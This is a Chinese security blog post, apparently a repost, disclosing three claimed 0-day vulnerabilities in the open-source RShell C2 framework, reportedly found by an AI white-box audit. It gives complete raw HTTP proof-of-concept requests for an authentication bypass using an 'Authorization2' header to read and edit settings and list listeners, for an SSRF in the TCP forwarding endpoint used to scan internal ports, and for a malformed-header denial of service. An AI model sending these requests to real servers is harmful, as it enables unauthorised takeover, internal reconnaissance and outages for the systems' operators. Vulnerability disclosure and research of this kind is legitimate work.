文章总结： 本文披露红队C2工具RShell的3个0day漏洞：身份认证绕过漏洞允许未授权访问配置和监听器接口；TCP转发功能存在SSRF漏洞可探测内网端口；畸形Authorization2头可触发拒绝服务。漏洞由AI白盒审计发现，作者提供完整POC并强调仅限合法安全测试使用。 综合评分： 87 文章分类： 漏洞分析,红队,渗透测试,WEB安全,安全工具

[首发]红队热门C2工具 RShell 身份认证绕过漏洞&SSRF漏洞&拒绝服务漏洞(0day x3)

原创

qysec qysec

吃瓜安全

2026年4月18日 00:18 山东

在小说阅读器读本章

去阅读

⚠️ 免责声明

1. 本文所分享的渗透测试技术、漏洞细节及工具用法，仅用于合法授权的渗透测试、安全学习与技术研究，严禁用于未授权的非法攻击、入侵他人系统及网络等违规违法行为。

2. 所有测试操作均在合法授权的靶场 / 测试环境中进行，未侵犯任何个人、企业及组织的合法权益。

3. 若读者擅自将本文内容用于非法用途，一切后果由其自行承担，与本文作者及公众号无关。请遵守《网络安全法》《数据安全法》等相关法律法规，共同维护网络安全。

首先十分感谢 Rubby2001 大佬开源这款项目，自 VShell 之后，终于又用到一款如此流畅丝滑的 C2 工具，而且还是开源免费的，再次向作者致谢。

今天用国内安全厂商的AI漏洞挖掘系统挖了下自己常用的开源渗透测试工具,不得不感慨AI渗透测试相较于传统人工渗透测试的效率和准确率,有预感今年HW一定近年来使用0day最多的一次….

因为这个不涉及到生产业务, 我就直接放poc了, 并且再声明一下这个漏洞不是我自己审计的,是纯AI白盒审计并且一次就复现成功的,并且误报率极低,喝喝茶的功夫就测完了。

目标地址 https://github.com/Rubby2001/Rshell—A-Cross-Platform-C2 Rshell是一款开源的golang编写的支持多平台的C2框架，旨在帮助安服人员渗透测试、红蓝对抗。 下载Rshell二进制文件并运行。 通过-p参数指定端口（默认端口8089）并运行：

./Rshell -p 8089
默认账号密码：admin/admin123

启动项目

basic认证

漏洞

1. 身份认证绕过漏洞

获取token 未授权访问受保护的接口

GET /api/settings/list HTTP/1.1
Host: 192.168.200.11:8089
Authorization2: Bearer 这里替换成上面拿到的token
User-Agent: Mozilla/5.0

未授权修改配置

POST /api/settings/edit HTTP/1.1
Host: 192.168.200.11:8089
Content-Type: application/json
Authorization2: Bearer 这里替换成token
User-Agent: Mozilla/5.0

[{"name":"wecom","value":"owned-by-poc"}]

未授权访问监听端口

GET /api/client/listener/list HTTP/1.1
Host: 192.168.200.11:8089
Authorization2: Bearer 这里替换成token

这里创建一个监听器 192.168.116.131:8083 成功拿到监听器相关信息

2. TCP转发导致服务端SSRF与内网端口探测（可与已存在身份绕过漏洞链式利用）

按照上面漏洞的方法拿到token 利用SSRF漏洞探测端口

POST /api/forward-connection HTTP/1.1
Host: 192.168.200.11:8089
Content-Type: application/json
Authorization2: Bearer 这里替换成你的JWT_TOKEN
User-Agent: Mozilla/5.0
Accept: /

{"type":"tcp","address":"127.0.0.1:1","proxy":""}

![](https://mmbiz.qpic.cn/sz_mmbiz_png/HQ1xrkfdVRVuuvib3xnyCRBLhNTYL8arFtXO5UNWRBtk1ZJLYModgeZvhrst1e9KM8QS2fwOH5EMUa6mJBucZRhBTia8bLBThRDFEP5CibgXwE/640?wx_fmt=png&watermark=1#imgIndex=6)
yakit爆破1-10000端口![](https://mmbiz.qpic.cn/mmbiz_png/HQ1xrkfdVRUN8MK2uAHaGMRDyl1alBfaIgqhtNvr51I8gIgt8cELAov3CoDAC8W2Vcdh2Z2hG0diaKlEhJmrRpGn9yeXYvHdaXhSb2sPWz60/640?wx_fmt=png&watermark=1#imgIndex=7)
存活的端口![](https://mmbiz.qpic.cn/mmbiz_png/HQ1xrkfdVRUJvLyWyaTGt9iaU3TdaBvxnwb2tUwhQFn7BkIicUnNQ7ib0rZWwNdOmQ6SmKjwKpxYmzM0lgibCcckiaDlH09B4RC1Pa08LicOoOuDQ/640?wx_fmt=png&watermark=1#imgIndex=8)
失败的端口
![](https://mmbiz.qpic.cn/mmbiz_png/HQ1xrkfdVRU1dAbxYZ3VBrPnCvmYzhkqa23bxYG9beKYwc19ECUAKvhxhAXLicW0ibArM7VIE8FbVU2EyicrHqy7KITibja9LyPKqme9SavhzOA/640?wx_fmt=png&watermark=1#imgIndex=9)

3. 拒绝服务漏洞（DoS）

无需登录 → 发送畸形头 Authorization2: x → 直接触发服务端 → 连接重置 + 日志风暴 → 远程 DoS 攻击

# 这三个随便哪一个都能触发该漏洞

# 1.

GET /api/settings/list HTTP/1.1
Host: 192.168.200.11:8089
Authorization2: x
User-Agent: Mozilla/5.0
Accept: /

# 2.

GET /api/client/listener/list HTTP/1.1 Host: 192.168.200.11:8089 Authorization2: x

# 3.

POST /api/forward-connection HTTP/1.1 Host: 192.168.200.11:8089 Authorization2: x

利用成功

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：吃瓜安全 qysec qysec《[首发]红队热门C2工具 RShell 身份认证绕过漏洞&SSRF漏洞&拒绝服务漏洞(0day x3)》